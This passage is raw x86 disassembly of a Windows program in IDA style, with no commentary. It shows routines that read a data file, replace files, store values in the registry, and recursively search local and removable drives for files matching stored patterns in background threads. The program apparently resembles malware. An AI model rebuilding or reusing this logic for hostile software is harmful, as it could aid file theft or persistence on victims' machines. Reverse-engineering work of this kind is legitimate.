pop ecx
push dword ptr [eax+8]
push dword ptr [eax]
lea eax, [ebp+var_208]
push eax
call dword_40FC8C
lea eax, [ebp+var_208]
push eax
push esi
push esi
call dword_40FC8C
and dword_40F5CC, 0
mov eax, esi
pop esi
leave
retn
sub_4034A0 endp
; =============== S U B R O U T I N E =======================================
sub_4034E8 proc near ; CODE XREF: sub_403723+3B�p
; sub_403723+118�p ...
arg_0 = dword ptr 4
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+28h]
call sub_409B48
mov edi, eax
xor esi, esi
cmp edi, esi
pop ecx
jnz short loc_403507
loc_403500: ; CODE XREF: sub_4034E8+80�j
xor al, al
jmp loc_4035AA
; ---------------------------------------------------------------------------
loc_403507: ; CODE XREF: sub_4034E8+16�j
mov eax, dword_40FB34
push esi
push esi
push esi
push esi
push 6
push dword ptr [eax+30h]
call sub_4095AA
mov eax, [esp+20h+arg_0]
add esp, 18h
cmp eax, esi
jnz short loc_40352A
mov eax, offset dword_40F5D0
loc_40352A: ; CODE XREF: sub_4034E8+3B�j
push esi
push esi
push 3
push esi
push esi
push 80000000h
push eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov dword_40F5CC, eax
push esi
jnz short loc_40356A
mov dword_40F5CC, esi
loc_40354D: ; CODE XREF: sub_4034E8+9B�j
mov eax, dword_40FB34
push esi
push esi
push esi
push 5
push dword ptr [eax+30h]
call sub_4095AA
push edi
call sub_409B7F
add esp, 1Ch
jmp short loc_403500
; ---------------------------------------------------------------------------
loc_40356A: ; CODE XREF: sub_4034E8+5D�j
push eax
call dword_40FDFC ; GetFileSize
cmp eax, 6
jnb short loc_403585
push dword_40F5CC
call dword_40FDAC ; CloseHandle
push esi
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403585: ; CODE XREF: sub_4034E8+8C�j
call dword_40FE50 ; GetCurrentThread
mov esi, eax
push esi
call dword_40FE4C ; GetThreadPriority
push 2
push esi
mov dword_40F7F0, eax
call dword_40FE48 ; SetThreadPriority
mov dword_40F7F4, edi
mov al, 1
loc_4035AA: ; CODE XREF: sub_4034E8+1A�j
pop edi
pop esi
retn
sub_4034E8 endp
; =============== S U B R O U T I N E =======================================
sub_4035AD proc near ; CODE XREF: sub_403723+57�p
; sub_403723+171�p ...
push dword_40F5CC
call dword_40FDAC ; CloseHandle
xor eax, eax
push eax
push eax
push eax
push eax
mov dword_40F5CC, eax
mov eax, dword_40FB34
push 5
push dword ptr [eax+30h]
call sub_4095AA
push dword_40F7F4
call sub_409B7F
add esp, 1Ch
push dword_40F7F0
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
retn
sub_4035AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035F5 proc near ; CODE XREF: sub_403723+49�p
; sub_403723+133�p ...
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, dword_40F5CC
sub esp, 14h
push ebx
push edi
xor edi, edi
cmp eax, edi
jnz short loc_40360F
xor eax, eax
jmp loc_40371F
; ---------------------------------------------------------------------------
loc_40360F: ; CODE XREF: sub_4035F5+11�j
push esi
push edi
push edi
push edi
mov [ebp+var_4], edi
push eax
jmp short loc_40363F
; ---------------------------------------------------------------------------
loc_403619: ; CODE XREF: sub_4035F5+69�j
cmp [ebp+var_4], 5
jnz loc_40371C
movzx esi, [ebp+var_12]
cmp esi, edi
jz short loc_403635
mov ax, [ebp+var_14]
cmp ax, [ebp+arg_0]
jz short loc_403665
loc_403635: ; CODE XREF: sub_4035F5+34�j
push 1
push edi
push esi
push dword_40F5CC
loc_40363F: ; CODE XREF: sub_4035F5+22�j
call dword_40FDC8 ; SetFilePointer
push edi
lea eax, [ebp+var_4]
push eax
push 5
lea eax, [ebp+var_14]
push eax
push dword_40F5CC
call dword_40FDF4 ; ReadFile
test eax, eax
jnz short loc_403619
jmp loc_40371C
; ---------------------------------------------------------------------------
loc_403665: ; CODE XREF: sub_4035F5+3E�j
push esi
call sub_4092F9
mov ebx, eax
cmp ebx, edi
pop ecx
jz loc_40371C
push edi
lea eax, [ebp+var_4]
push eax
push esi
push ebx
push dword_40F5CC
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_403715
cmp [ebp+var_4], esi
jnz short loc_403715
cmp [ebp+arg_4], edi
jnz short loc_4036A4
push ebx
loc_40369C: ; CODE XREF: sub_4035F5+10E�j
call sub_409317
pop ecx
jmp short loc_403711
; ---------------------------------------------------------------------------
loc_4036A4: ; CODE XREF: sub_4035F5+A4�j
test [ebp+var_10], 1
mov [ebp+var_8], edi
mov [ebp+var_C], edi
jz short loc_4036C0
lea eax, [ebp+var_8]
push eax
push esi
push ebx
call sub_409A6F
add esp, 0Ch
mov esi, eax
loc_4036C0: ; CODE XREF: sub_4035F5+B9�j
cmp esi, edi
jz short loc_403711
test [ebp+var_10], 2
jz short loc_4036E3
mov eax, [ebp+var_8]
cmp eax, edi
jnz short loc_4036D3
mov eax, ebx
loc_4036D3: ; CODE XREF: sub_4035F5+DA�j
lea ecx, [ebp+var_C]
push ecx
push esi
push eax
call sub_409AD3
add esp, 0Ch
mov esi, eax
loc_4036E3: ; CODE XREF: sub_4035F5+D3�j
cmp esi, edi
jz short loc_403711
test [ebp+var_10], 3
jz short loc_40370C
push ebx
call sub_409317
mov eax, [ebp+var_C]
cmp eax, edi
pop ecx
mov ecx, [ebp+arg_4]
jz short loc_403705
push [ebp+var_8]
mov [ecx], eax
jmp short loc_40369C
; ---------------------------------------------------------------------------
loc_403705: ; CODE XREF: sub_4035F5+107�j
mov eax, [ebp+var_8]
mov [ecx], eax
jmp short loc_403711
; ---------------------------------------------------------------------------
loc_40370C: ; CODE XREF: sub_4035F5+F6�j
mov eax, [ebp+arg_4]
mov [eax], ebx
loc_403711: ; CODE XREF: sub_4035F5+AD�j
; sub_4035F5+CD�j ...
mov eax, esi
jmp short loc_40371E
; ---------------------------------------------------------------------------
loc_403715: ; CODE XREF: sub_4035F5+96�j
; sub_4035F5+9F�j
push ebx
call sub_409317
pop ecx
loc_40371C: ; CODE XREF: sub_4035F5+28�j
; sub_4035F5+6B�j ...
xor eax, eax
loc_40371E: ; CODE XREF: sub_4035F5+11E�j
pop esi
loc_40371F: ; CODE XREF: sub_4035F5+15�j
pop edi
pop ebx
leave
retn
sub_4035F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403723 proc near ; CODE XREF: sub_403956+9F�p
; sub_403956+14C�p
var_210 = byte ptr -210h
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
call sub_409E6A
push dword_40FAB8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405CCB
add esp, 0Ch
push [ebp+arg_0]
mov [ebp+var_1], al
call dword_40FB40
xor ebx, ebx
cmp [ebp+var_1], bl
jz short loc_40378D
push 1
push [ebp+arg_4]
call sub_4034E8
test al, al
pop ecx
pop ecx
jz short loc_40378D
push ebx
push 1
call sub_4035F5
pop ecx
cmp eax, 4
pop ecx
setz [ebp+var_1]
call sub_4035AD
cmp [ebp+var_1], bl
jnz short loc_403793
push [ebp+arg_4]
call sub_409B2C
pop ecx
loc_40378D: ; CODE XREF: sub_403723+34�j
; sub_403723+44�j ...
or eax, 0FFFFFFFFh
loc_403790: ; CODE XREF: sub_403723+87�j
; sub_403723+22E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403793: ; CODE XREF: sub_403723+5F�j
mov eax, dword_40FB34
push dword ptr [eax+28h]
call sub_409B48
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_4037AC
loc_4037A8: ; CODE XREF: sub_403723+110�j
xor eax, eax
jmp short loc_403790
; ---------------------------------------------------------------------------
loc_4037AC: ; CODE XREF: sub_403723+83�j
push esi
push edi
call dword_40FE50 ; GetCurrentThread
mov esi, eax
push esi
call dword_40FE4C ; GetThreadPriority
push 2
push esi
mov edi, eax
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 6
push dword ptr [eax+30h]
call sub_4095AA
push [ebp+arg_8]
call sub_409B2C
add esp, 1Ch
push 3
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FE68 ; MoveFileExW
test eax, eax
setnz [ebp+var_1]
cmp [ebp+var_1], bl
jnz short loc_403808
push [ebp+arg_4]
call sub_409B2C
pop ecx
loc_403808: ; CODE XREF: sub_403723+DA�j
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 5
push dword ptr [eax+30h]
call sub_4095AA
push [ebp+var_8]
call sub_409B7F
add esp, 1Ch
push edi
push esi
call dword_40FE48 ; SetThreadPriority
cmp [ebp+var_1], bl
pop edi
pop esi
jz loc_4037A8
push ebx
push ebx
call sub_4034E8
test al, al
pop ecx
pop ecx
jz loc_40378D
lea eax, [ebp+var_8]
push eax
push 1
mov [ebp+var_1], bl
mov [ebp+var_8], ebx
call sub_4035F5
cmp eax, 4
pop ecx
pop ecx
jb loc_4038E9
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, dword_40FC1C
cmp ecx, [edx+40h]
ja short loc_40387C
test [ebp+arg_C], 1
jz short loc_4038E9
loc_40387C: ; CODE XREF: sub_403723+151�j
push eax
call sub_409317
lea eax, [ebp+var_8]
push eax
push 2
call sub_4035F5
add esp, 0Ch
test eax, eax
jz short loc_4038E9
call sub_4035AD
lea eax, [ebp+var_210]
push eax
mov [ebp+var_1], 1
call sub_409DD4
push dword_40FAB8
lea eax, [ebp+var_210]
push [ebp+var_8]
push eax
push dword_40FABC
call sub_405DBF
add esp, 14h
test al, al
jz short loc_4038DC
push ebx
lea eax, [ebp+var_210]
push eax
push ebx
call sub_40B046
add esp, 0Ch
loc_4038DC: ; CODE XREF: sub_403723+1A6�j
lea eax, [ebp+var_210]
push eax
call sub_409B2C
pop ecx
loc_4038E9: ; CODE XREF: sub_403723+13D�j
; sub_403723+157�j ...
push [ebp+var_8]
call sub_409317
cmp [ebp+var_1], bl
pop ecx
jnz short loc_40394E
lea eax, [ebp+var_8]
push eax
push 3FAh
call sub_4035F5
test eax, eax
pop ecx
pop ecx
jz short loc_403914
push [ebp+var_8]
call sub_409317
pop ecx
loc_403914: ; CODE XREF: sub_403723+1E6�j
lea eax, [ebp+var_8]
push eax
push 3F1h
call sub_4035F5
cmp eax, ebx
pop ecx
pop ecx
jz short loc_403949
push eax
push [ebp+var_8]
call sub_408CAE
test al, al
pop ecx
pop ecx
jz short loc_403940
push [ebp+var_8]
call sub_405E38
pop ecx
loc_403940: ; CODE XREF: sub_403723+212�j
push [ebp+var_8]
call sub_409317
pop ecx
loc_403949: ; CODE XREF: sub_403723+203�j
call sub_4035AD
loc_40394E: ; CODE XREF: sub_403723+1D2�j
xor eax, eax
inc eax
jmp loc_403790
sub_403723 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403956 proc near ; CODE XREF: sub_403AF2+2�p
; sub_407115+F�p
var_214 = byte ptr -214h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push offset dword_40F7D8
call dword_40FE84 ; RtlEnterCriticalSection
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_1], bl
jz short loc_40397D
mov [ebp+var_8], esi
jmp short loc_403997
; ---------------------------------------------------------------------------
loc_40397D: ; CODE XREF: sub_403956+20�j
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FC1C
movzx ecx, byte ptr [eax+64h]
push ecx
add eax, 6Ch
push eax
call sub_409A6F
add esp, 0Ch
loc_403997: ; CODE XREF: sub_403956+25�j
push dword_40F5C8
lea eax, [ebp+var_214]
push eax
call dword_40FD98 ; lstrcpyW
mov eax, dword_40FB34
push dword ptr [eax+1Ch]
lea eax, [ebp+var_214]
push eax
call dword_40FDA4 ; lstrcatW
cmp [ebp+var_8], ebx
jz short loc_403A0E
push ebx
push 84043300h
push ebx
push ebx
push [ebp+var_8]
push dword_40FABC
call dword_40FB44
cmp eax, ebx
jz short loc_403A0E
xor ecx, ecx
cmp esi, ebx
setnz cl
push ecx
push dword_40F5C8
lea ecx, [ebp+var_214]
push ecx
push eax
call sub_403723
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_403A0E
cmp eax, 1
setz [ebp+var_1]
jmp loc_403AD3
; ---------------------------------------------------------------------------
loc_403A0E: ; CODE XREF: sub_403956+6C�j
; sub_403956+87�j ...
cmp esi, ebx
jnz loc_403AD3
push edi
push ebx
xor edi, edi
push ebx
mov [ebp+var_C], edi
call sub_4034E8
test al, al
pop ecx
pop ecx
jz short loc_403A5B
lea eax, [ebp+var_C]
push eax
push 3EBh
call sub_4035F5
cmp eax, ebx
mov edi, [ebp+var_C]
pop ecx
pop ecx
jz short loc_403A56
push eax
push edi
call sub_408CAE
test al, al
pop ecx
pop ecx
jnz short loc_403A56
push edi
call sub_409317
pop ecx
xor edi, edi
loc_403A56: ; CODE XREF: sub_403956+E8�j
; sub_403956+F5�j
call sub_4035AD
loc_403A5B: ; CODE XREF: sub_403956+D1�j
cmp edi, ebx
mov esi, edi
jz short loc_403AC8
cmp [edi], bl
jz short loc_403AC8
loc_403A65: ; CODE XREF: sub_403956+167�j
push 2710h
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_403AC8
push ebx
push 84043300h
push ebx
push ebx
push esi
push dword_40FABC
call dword_40FB44
cmp eax, ebx
jz short loc_403AAF
push ebx
push dword_40F5C8
lea ecx, [ebp+var_214]
push ecx
push eax
call sub_403723
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_403AC1
loc_403AAF: ; CODE XREF: sub_403956+13B�j
push 1
push esi
call sub_408CD4
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_403A65
jmp short loc_403AC8
; ---------------------------------------------------------------------------
loc_403AC1: ; CODE XREF: sub_403956+157�j
cmp eax, 1
setz [ebp+var_1]
loc_403AC8: ; CODE XREF: sub_403956+109�j
; sub_403956+10D�j ...
push edi
call sub_409317
mov esi, [ebp+arg_0]
pop ecx
pop edi
loc_403AD3: ; CODE XREF: sub_403956+B3�j
; sub_403956+BA�j
push offset dword_40F7D8
call dword_40FE88 ; RtlLeaveCriticalSection
cmp esi, ebx
pop esi
pop ebx
jnz short loc_403AED
push [ebp+var_8]
call sub_409317
pop ecx
loc_403AED: ; CODE XREF: sub_403956+18C�j
mov al, [ebp+var_1]
leave
retn
sub_403956 endp
; =============== S U B R O U T I N E =======================================
sub_403AF2 proc near ; CODE XREF: sub_403AF2+28�j
; DATA XREF: sub_403B25+1D�o ...
push 0
call sub_403956
test al, al
mov eax, dword_40FC1C
pop ecx
jz short loc_403B08
mov eax, [eax+4Ch]
jmp short loc_403B0B
; ---------------------------------------------------------------------------
loc_403B08: ; CODE XREF: sub_403AF2+F�j
mov eax, [eax+50h]
loc_403B0B: ; CODE XREF: sub_403AF2+14�j
push eax
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz short sub_403AF2
dec dword_40FAB4
retn 4
sub_403AF2 endp
; =============== S U B R O U T I N E =======================================
sub_403B25 proc near ; CODE XREF: sub_4086F4:loc_408742�p
call sub_4034A0
push offset dword_40F7D8
mov dword_40F5C8, eax
call dword_40FE80 ; InitializeCriticalSection
inc dword_40FAB4
push 0
push offset sub_403AF2
call sub_40A263
pop ecx
pop ecx
retn
sub_403B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B4F proc near ; CODE XREF: sub_403CC8+12D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 1
push ebx
push ebx
push ebx
push dword ptr [eax+1A0h]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_403BB4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_C], 4
push [ebp+var_8]
mov [ebp+var_4], ebx
call dword_40FBDC
test eax, eax
jnz short loc_403BAB
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_4]
jnz short loc_403BAB
mov bl, 1
loc_403BAB: ; CODE XREF: sub_403B4F+50�j
; sub_403B4F+58�j
push [ebp+var_8]
call dword_40FBE4
loc_403BB4: ; CODE XREF: sub_403B4F+2C�j
mov al, bl
pop ebx
leave
retn
sub_403B4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BB9 proc near ; CODE XREF: sub_403CC8+194�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
push esi
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 2
push esi
push esi
push esi
push dword ptr [eax+1A0h]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_403C03
push 4
lea eax, [ebp+arg_4]
push eax
push 4
push esi
push [ebp+arg_0]
push [ebp+var_4]
call dword_40FBE8
push [ebp+var_4]
call dword_40FBE4
loc_403C03: ; CODE XREF: sub_403BB9+2A�j
pop esi
leave
retn
sub_403BB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C06 proc near ; CODE XREF: sub_403F78:loc_404012�p
; sub_404034:loc_404125�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push offset dword_40F7F8
mov [ebp+var_4], esi
call dword_40FE84 ; RtlEnterCriticalSection
xor eax, eax
cmp dword_40F810, esi
mov [ebp+var_C], eax
jbe short loc_403CA1
push ebx
push edi
loc_403C2C: ; CODE XREF: sub_403C06+97�j
mov ecx, dword_40F814
lea eax, [ecx+eax*4]
cmp dword ptr [eax], 0
jz short loc_403C90
push 0FFFFFFFFh
push dword ptr [eax]
call sub_40A6F7
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jz short loc_403C90
push eax
call dword_40FD94 ; lstrlenA
mov ebx, eax
lea edi, [ebx+esi]
lea eax, [edi+1]
push eax
lea eax, [ebp+var_4]
push eax
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_403C87
mov eax, [ebp+var_4]
push ebx
push [ebp+var_8]
add esi, eax
push esi
call sub_409331
mov eax, [ebp+var_4]
mov esi, edi
add esp, 0Ch
mov byte ptr [esi+eax], 20h
inc esi
loc_403C87: ; CODE XREF: sub_403C06+63�j
push [ebp+var_8]
call sub_409317
pop ecx
loc_403C90: ; CODE XREF: sub_403C06+32�j
; sub_403C06+44�j
mov eax, [ebp+var_C]
inc eax
cmp eax, dword_40F810
mov [ebp+var_C], eax
jb short loc_403C2C
pop edi
pop ebx
loc_403CA1: ; CODE XREF: sub_403C06+22�j
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push esi
push [ebp+var_4]
push offset dword_401028
call sub_40A4C3
push [ebp+var_4]
call sub_409317
add esp, 10h
pop esi
leave
retn
sub_403C06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CC8 proc near ; CODE XREF: sub_403CC8+C1�p
; sub_403EB7+8A�p
var_664 = byte ptr -664h
var_45C = byte ptr -45Ch
var_256 = word ptr -256h
var_254 = byte ptr -254h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_228 = word ptr -228h
var_226 = word ptr -226h
var_224 = word ptr -224h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 664h
push ebx
push offset dword_40103C
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_45C]
xor ebx, ebx
push eax
mov [ebp+var_256], bx
call dword_40FE94 ; FindFirstFileW
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_403D13
xor al, al
jmp loc_403EB4
; ---------------------------------------------------------------------------
loc_403D13: ; CODE XREF: sub_403CC8+42�j
push esi
push edi
mov edi, offset dword_40F7F8
loc_403D1A: ; CODE XREF: sub_403CC8+1D9�j
cmp [ebp+var_228], 2Eh
jnz short loc_403D48
cmp [ebp+var_226], bx
jz loc_403E87
cmp [ebp+var_226], 2Eh
jnz short loc_403D48
cmp [ebp+var_224], bx
jz loc_403E87
loc_403D48: ; CODE XREF: sub_403CC8+5A�j
; sub_403CC8+71�j
test [ebp+var_254], 10h
jz short loc_403D95
lea eax, [ebp+var_228]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
mov esi, [ebp+arg_4]
push 3E8h
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_403EA7
lea eax, [ebp+var_45C]
push esi
push eax
call sub_403CC8
pop ecx
pop ecx
jmp loc_403E87
; ---------------------------------------------------------------------------
loc_403D95: ; CODE XREF: sub_403CC8+87�j
push edi
call dword_40FE84 ; RtlEnterCriticalSection
xor esi, esi
cmp dword_40F810, ebx
jbe loc_403E78
loc_403DAA: ; CODE XREF: sub_403CC8+13F�j
mov eax, dword_40F814
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_403E00
cmp [ebp+var_238], ebx
jnz short loc_403E00
push dword ptr [eax]
lea eax, [ebp+var_228]
push eax
call dword_40FC9C
test eax, eax
jz short loc_403E00
lea eax, [ebp+var_228]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
push [ebp+var_234]
lea eax, [ebp+var_45C]
push eax
call sub_403B4F
test al, al
pop ecx
pop ecx
jz short loc_403E0B
loc_403E00: ; CODE XREF: sub_403CC8+EC�j
; sub_403CC8+F4�j ...
inc esi
cmp esi, dword_40F810
jb short loc_403DAA
jmp short loc_403E78
; ---------------------------------------------------------------------------
loc_403E0B: ; CODE XREF: sub_403CC8+136�j
lea eax, [ebp+var_228]
push eax
push [ebp+var_234]
mov eax, dword_40FB34
push dword ptr [eax+1A4h]
lea eax, [ebp+var_664]
push 103h
push eax
call dword_40FC84
lea eax, [ebp+var_664]
push eax
lea eax, [ebp+var_45C]
push eax
call sub_40BA83
add esp, 1Ch
test al, al
jz short loc_403E63
push [ebp+var_234]
lea eax, [ebp+var_45C]
push eax
call sub_403BB9
pop ecx
pop ecx
loc_403E63: ; CODE XREF: sub_403CC8+185�j
mov eax, [ebp+arg_4]
push 2710h
push dword ptr [eax+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_403EA7
loc_403E78: ; CODE XREF: sub_403CC8+DC�j
; sub_403CC8+141�j
push edi
call dword_40FE88 ; RtlLeaveCriticalSection
push 14h
call dword_40FD68 ; Sleep
loc_403E87: ; CODE XREF: sub_403CC8+63�j
; sub_403CC8+7A�j ...
cmp dword_40F810, ebx
jbe short loc_403EA7
lea eax, [ebp+var_254]
push eax
push [ebp+var_4]
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz loc_403D1A
loc_403EA7: ; CODE XREF: sub_403CC8+B3�j
; sub_403CC8+1AE�j ...
push [ebp+var_4]
call dword_40FE9C ; FindClose
pop edi
mov al, 1
pop esi
loc_403EB4: ; CODE XREF: sub_403CC8+46�j
pop ebx
leave
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EB7 proc near ; DATA XREF: sub_40412F+52�o
; sub_415655+52�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0FFFFFFF1h
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
mov esi, [ebp+arg_0]
mov edi, 2710h
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_403F70
push ebx
loc_403EE9: ; CODE XREF: sub_403EB7+B2�j
cmp dword_40F810, 0
jz short loc_403F5D
call dword_40FD38 ; GetLogicalDrives
mov [ebp+arg_0], eax
mov bl, 2
loc_403EFD: ; CODE XREF: sub_403EB7+A4�j
xor eax, eax
inc eax
mov cl, bl
shl eax, cl
mov ecx, [ebp+arg_0]
test eax, ecx
jz short loc_403F56
and [ebp+var_A], 0
movzx ax, bl
add ax, 41h
mov [ebp+var_10], ax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_E], 3Ah
mov [ebp+var_C], 5Ch
call dword_40FD3C ; GetDriveTypeW
cmp eax, 3
jz short loc_403F3C
cmp eax, 2
jnz short loc_403F56
loc_403F3C: ; CODE XREF: sub_403EB7+7E�j
lea eax, [ebp+var_10]
push esi
push eax
call sub_403CC8
pop ecx
pop ecx
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_403F6F
loc_403F56: ; CODE XREF: sub_403EB7+52�j
; sub_403EB7+83�j
inc bl
cmp bl, 20h
jb short loc_403EFD
loc_403F5D: ; CODE XREF: sub_403EB7+39�j
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_403EE9
loc_403F6F: ; CODE XREF: sub_403EB7+9D�j
pop ebx
loc_403F70: ; CODE XREF: sub_403EB7+2B�j
dec dword ptr [esi]
pop edi
pop esi
leave
retn 4
sub_403EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F78 proc near ; CODE XREF: sub_40412F+3F�p
; sub_406FFC+1A�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_4]
push ebx
push edi
push 64h
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
add ecx, eax
push ecx
push eax
mov [ebp+var_1], 0
mov [ebp+var_8], ebx
call sub_40B231
mov edi, eax
add esp, 14h
cmp edi, ebx
jz loc_40402D
push offset dword_40F7F8
call dword_40FE84 ; RtlEnterCriticalSection
mov eax, dword_40F810
add eax, edi
shl eax, 2
push eax
push offset dword_40F814
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_404012
cmp edi, ebx
jbe short loc_404012
push esi
loc_403FD6: ; CODE XREF: sub_403F78+97�j
mov eax, [ebp+var_8]
mov esi, dword_40F810
push 0FFFFFFFFh
push dword ptr [eax+ebx*4]
shl esi, 2
call sub_40A791
pop ecx
pop ecx
mov ecx, dword_40F814
mov [esi+ecx], eax
mov eax, dword_40F814
cmp dword ptr [esi+eax], 0
jz short loc_40400C
inc dword_40F810
mov [ebp+var_1], 1
loc_40400C: ; CODE XREF: sub_403F78+88�j
inc ebx
cmp ebx, edi
jb short loc_403FD6
pop esi
loc_404012: ; CODE XREF: sub_403F78+57�j
; sub_403F78+5B�j
call sub_403C06
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push edi
push [ebp+var_8]
call sub_4093AC
pop ecx
pop ecx
loc_40402D: ; CODE XREF: sub_403F78+2D�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_403F78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404034 proc near ; CODE XREF: sub_406FFC:loc_40701D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_4]
push edi
push 64h
xor edi, edi
push edi
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_0]
add ecx, eax
push ecx
push eax
mov [ebp+var_4], edi
call sub_40B231
add esp, 14h
cmp eax, edi
mov [ebp+arg_0], eax
jz loc_404125
push ebx
push offset dword_40F7F8
call dword_40FE84 ; RtlEnterCriticalSection
xor ebx, ebx
cmp [ebp+arg_0], edi
jbe short loc_4040E0
push esi
loc_404076: ; CODE XREF: sub_404034+A9�j
mov eax, [ebp+var_4]
push 0FFFFFFFFh
push dword ptr [eax+ebx*4]
call sub_40A791
cmp eax, edi
pop ecx
pop ecx
mov [ebp+arg_4], eax
jz short loc_4040D9
xor esi, esi
cmp dword_40F810, edi
jbe short loc_4040D0
loc_404096: ; CODE XREF: sub_404034+9A�j
mov eax, dword_40F814
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_4040C7
push [ebp+arg_4]
push dword ptr [eax]
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz short loc_4040C7
mov eax, dword_40F814
push dword ptr [eax+esi*4]
call sub_409317
mov eax, dword_40F814
pop ecx
mov [eax+esi*4], edi
loc_4040C7: ; CODE XREF: sub_404034+6C�j
; sub_404034+7B�j
inc esi
cmp esi, dword_40F810
jb short loc_404096
loc_4040D0: ; CODE XREF: sub_404034+60�j
push [ebp+arg_4]
call sub_409317
pop ecx
loc_4040D9: ; CODE XREF: sub_404034+56�j
inc ebx
cmp ebx, [ebp+arg_0]
jb short loc_404076
pop esi
